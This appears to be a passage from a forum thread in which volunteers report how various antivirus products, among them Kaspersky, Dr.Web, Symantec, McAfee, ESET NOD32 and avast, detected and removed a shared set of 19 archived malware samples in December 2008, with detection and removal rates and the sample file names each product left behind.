  Trojan2008.12.24@009.zip
  Virus2008.12.24@001.gz
  Worm2008.12.24@001.gz
  Worm2008.12.24@002.zip
  Worm2008.12.24@003.gz
Detected but not removed: none
Detected and quarantined: none
Tester: KINGYEH

SearchGUI
Antivirus version: 20080825
Definitions date: none
Heuristics setting: default heuristics
Test environment: Windows XP SP3 x86
Other: manual scan setting: no action
Count shown by the antivirus: 17/19
Actual file count: 19
Files removed: 0
Files remaining: 2
Not detected: 2
Detected but not removed: 17
Detection rate: 17/19 = 89.5%
Removal rate: 0/19 = 0.0%
Remaining files:
  Backdoor2008.12.24@003.zip
  Trojan2008.12.24@009.zip
Files detected but not removed:
  Backdoor2008.12.24@001.zip
  Backdoor2008.12.24@002.zip
  Backdoor2008.12.24@003.gz
  Backdoor2008.12.24@005.zip
  Backdoor2008.12.24@006.zip
  Worm2008.12.24@001.gz
  Worm2008.12.24@002.zip
  Worm2008.12.24@003.gz
  Virus2008.12.24@001.gz
  Trojan2008.12.24@001.gz
  Trojan2008.12.24@002.zip
  Trojan2008.12.24@003.zip
  Trojan2008.12.24@004.zip
  Trojan2008.12.24@005.zip
  Trojan2008.12.24@006.zip
  Trojan2008.12.24@007.rar
  Trojan2008.12.24@008.gz
Files detected but could only be quarantined: none
Tester: asusp4b533

Kaspersky Internet Security
Antivirus version: 8.0.0.506
Definitions date: 2008/12/25
Heuristics setting: high heuristics
Test environment: Windows Vista Ultimate SP1 x86
Other: none
Count shown by the antivirus: 19/58
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files: none
Files detected but not removed: none
Files detected but could only be quarantined: none
Tester: Bug

Dr.Web anti-virus
Antivirus version: 4.44.5
Definitions date: 2008/12/25
Heuristics setting: default heuristics
Test environment: Windows XP SP2 x86
Other: manual scan setting: delete on detection
Count shown by the antivirus: 13/44
Actual file count: 19
Files removed: 13
Files remaining: 6
Not detected: 6
Detected but not removed: 0
Detection rate: 13/19 = 68.4%
Removal rate: 13/19 = 68.4%
Remaining files:
  Backdoor2008.12.24@006.zip
  Trojan2008.12.24@003.zip
  Trojan2008.12.24@004.zip
  Trojan2008.12.24@005.zip
  Trojan2008.12.24@009.zip
  Worm2008.12.24@002.zip
Files detected but not removed: none
Files detected but could only be quarantined: none
Tester: haol

Symantec Endpoint Security
Antivirus version: 11.0.3001.2224
Definitions date: 2008/12/25 r24
Heuristics setting: high heuristics
Test environment: Windows XP SP3 x86 (Virtual PC)
Other: none
Count shown by the antivirus: 15/38
Actual file count: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed: 0
Detection rate: 15/19 = 78.9%
Removal rate: 15/19 = 78.9%
Remaining files:
  Trojan2008.12.24@003.zip
  Trojan2008.12.24@009.zip
  Worm2008.12.24@001.gz
  Worm2008.12.24@002.zip
Files detected but not removed: none
Files detected but could only be quarantined: none
Tester: imdino

McAfee VirusScan Plus
Antivirus version: 5300.2777
Definitions date: 2008/12/25 (DAT: 5475)
Test environment: Windows XP SP3 x86
Other: manual scan setting: delete on detection
Count shown by the antivirus: 15/19
Actual file count: 19
Files removed: 6
Files remaining: 13
Not detected: 4
Detected but not removed: 9
Detection rate: 15/19 = 78.9%
Removal rate: 6/19 = 31.6%
Remaining files:
  Backdoor2008.12.24@002.zip
  Backdoor2008.12.24@003.zip
  Backdoor2008.12.24@005.zip
  Backdoor2008.12.24@006.zip
  Trojan2008.12.24@002.zip
  Trojan2008.12.24@003.zip
  Trojan2008.12.24@004.zip
  Trojan2008.12.24@005.zip
  Trojan2008.12.24@006.zip
  Trojan2008.12.24@009.zip
  Worm2008.12.24@001.gz
  Worm2008.12.24@002.zip
  Backdoor2008.12.24@001.zip
Files detected but not removed: omitted
Files detected but could only be quarantined: omitted
Tester: integear

TrendMicro OfficeScan
Antivirus version: 8.0
Definitions date: 2008/12/25 5.731.00
Heuristics setting: none
Count shown by the antivirus: 19
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files: none
Files detected but not removed: none
Tester: kennyg

TrendMicro Internet Security
Antivirus version: 17.0.1438
Definitions date: 2008/12/25 5.732.60
Heuristics setting: none
Count shown by the antivirus: 19
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files: none
Files detected but not removed: none
Tester: kennyg

Kaspersky Anti-Virus
Antivirus version: 7.0.1.325
Definitions date: 27/12/2008
Heuristics setting: default heuristics
Test environment: Windows Vista Basic SP1 x86
Other: all threat categories selected
Count shown by the antivirus: 19/79
Actual file count: 19
Files removed: 13
Files remaining: 6
Not detected: 0
Detected but not removed: 6
Detection rate: 19/19 = 100%
Removal rate: 13/19 = 68.4%
Remaining files:
  Backdoor2008.12.24@003.gz
  Trojan2008.12.24@001.gz
  Trojan2008.12.24@008.gz
  Virus2008.12.24@001.gz
  Worm2008.12.24@001.gz
  Worm2008.12.24@003.gz
Files detected but not removed:
  Backdoor2008.12.24@003.gz
  Trojan2008.12.24@001.gz
  Trojan2008.12.24@008.gz
  Virus2008.12.24@001.gz
  Worm2008.12.24@001.gz
  Worm2008.12.24@003.gz
Tester: kitman231

江民防毒 (Jiangmin Antivirus) KV2008
Scan engine version: 11.00.800
Definitions date: 2008/12/25
Heuristics setting: none
Count shown by the antivirus: forgot to check
Actual file count: 19
Files removed: 19
Files remaining: 0
Not detected: 0
Detected but not removed: 0
Detection rate: 19/19 = 100%
Removal rate: 19/19 = 100%
Remaining files: none
Files detected but not removed: none
Tester: PHT

Panda Internet Security
Antivirus version: 2009 14.00.00
Definitions date: 2008/12/26
Heuristics setting: high heuristics
Test environment: Windows Vista Ultimate SP1 x86
Other: manual scan setting: delete on detection
Count shown by the antivirus: 18/19
Actual file count: 19 (objects inside archives)
Files removed: 16 (objects inside archives)
Files remaining: 3 (objects inside archives)
Files flagged by heuristics: 1
Not detected: 0 (objects inside archives)
Detected but not removed: 3
Detection rate: 19/19 = 100%
Removal rate: 16/19 = 84%
Remaining files:
  Trojan2008.12.24@007
  Trojan2008.12.24@009
  Worm2008.12.24@002
Files detected but not removed:
  Trojan2008.12.24@007
  Trojan2008.12.24@009
  Worm2008.12.24@002
Files detected but could only be quarantined: none
Tester: Shisin

ESET NOD32 Antivirus
Antivirus version: 3.0.669.0
Definitions version: 3718
Definitions date: 2008/12/26
Heuristics setting: advanced
Test environment: Windows XP Professional SP3 x86 (VMware)
Other: manual scan, default settings, delete on detection
Count shown by the antivirus: 18/43
Actual file count: 19
Files removed: 18
Files remaining: 1
Not detected: 1
Detected but not removed: 0
Detection rate: 18/19 = 94.7%
Removal rate: 18/19 = 94.7%
Remaining files:
  Trojan2008.12.24@009.zip
Files detected but not removed: none
Files detected but could only be quarantined: none
Tester: 小狄~

Norton Internet Security
Antivirus version: 2009 16.2.0.7
Definitions date: 2008/12/28
Test environment: Windows 7 6956
Other:
Count shown by the antivirus: 39/15
Actual file count: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed: 4
Detection rate: 15/19 = 79%
Removal rate: 15/19 = 79%
Remaining files (check again after the reboot has completed):
  Trojan2008.12.24@003
  Trojan2008.12.24@009
  Worm2008.12.24@001
  Worm2008.12.24@002
Files detected but not removed (check again after the reboot has completed): none
Files detected but could only be quarantined: none
Tester: ss30102

PC Tools Internet Security
Antivirus version: 2009 6.0.0.386
Definitions date: 2008/12/28
Test environment: Windows XP
Other:
Count shown by the antivirus: 19/14
Actual file count: 19
Files removed: 14
Files remaining: 5
Not detected: 5
Detected but not removed: 5
Detection rate: 14/19 = 74%
Removal rate: 14/19 = 74%
Remaining files (check again after the reboot has completed):
  Backdoor2008.12.24@002.zip
  Backdoor2008.12.24@003.zip
  Backdoor2008.12.24@005.zip
  Trojan2008.12.24@009.zip
  Worm2008.12.24@002.zip
Files detected but not removed (check again after the reboot has completed): none
Files detected but could only be quarantined: none
Tester: ss30102

VBA32 Workstation (test 1)
Antivirus version: 3.12.8.10
Definitions version: 2008/12/21 08:09
Heuristics setting: Excessive
Test environment: Windows XP SP2 in VMware
Other: Thorough scanning mode; Detect Spyware, Adware, Riskware; Detect installers of malware; Mail scanning
Count shown by the antivirus: N/A
Actual file count: 19
Files removed: 17 (16 known threats + 0 known adware + 1 unknown threat)
Files remaining: 2
Not detected: 2
Detected but not removed: 0
Detection rate: 17/19 = 89.47%
Removal rate: 17/19 = 89.47%
Remaining files:
  Backdoor2008.12.24@003.gz
  Trojan2008.12.24@009.zip
Files detected but not removed: N/A
Tester: 000110

VBA32 Workstation (test 2)
Antivirus version: 3.12.8.10
Definitions version: 2008/12/21 08:09
Heuristics setting: default settings
Test environment: Windows XP SP2 in VMware
Other: right-click scan (i.e. default settings)
Count shown by the antivirus: N/A
Actual file count: 19
Files removed: 15
Files remaining: 4
Not detected: 4
Detected but not removed:
Detection rate: 15/19 = 78.95%
Removal rate: 15/19 = 78.95%
Remaining files:
  Backdoor2008.12.24@003.gz
  Backdoor2008.12.24@005.zip
  Trojan2008.12.24@007.rar
  Trojan2008.12.24@009.zip
Files detected but not removed: N/A
Tester: 000110

avast! Antivirus
Antivirus version: 4.8.1296
Definitions date: 2008/12/28
Test environment: Windows Vista Home Basic x86 (physical machine)
Count shown by the antivirus: 60/23
Actual file count: 19
Files removed: 18
Files remaining: 1
Not detected: 1
Detected but not removed: 0
Detection rate: 18/19 = 95%
Removal rate: 18/18 = 100%
Remaining files:
  Trojan2008.12.24@005.zip
Tester: 戴計 (Tai Kai)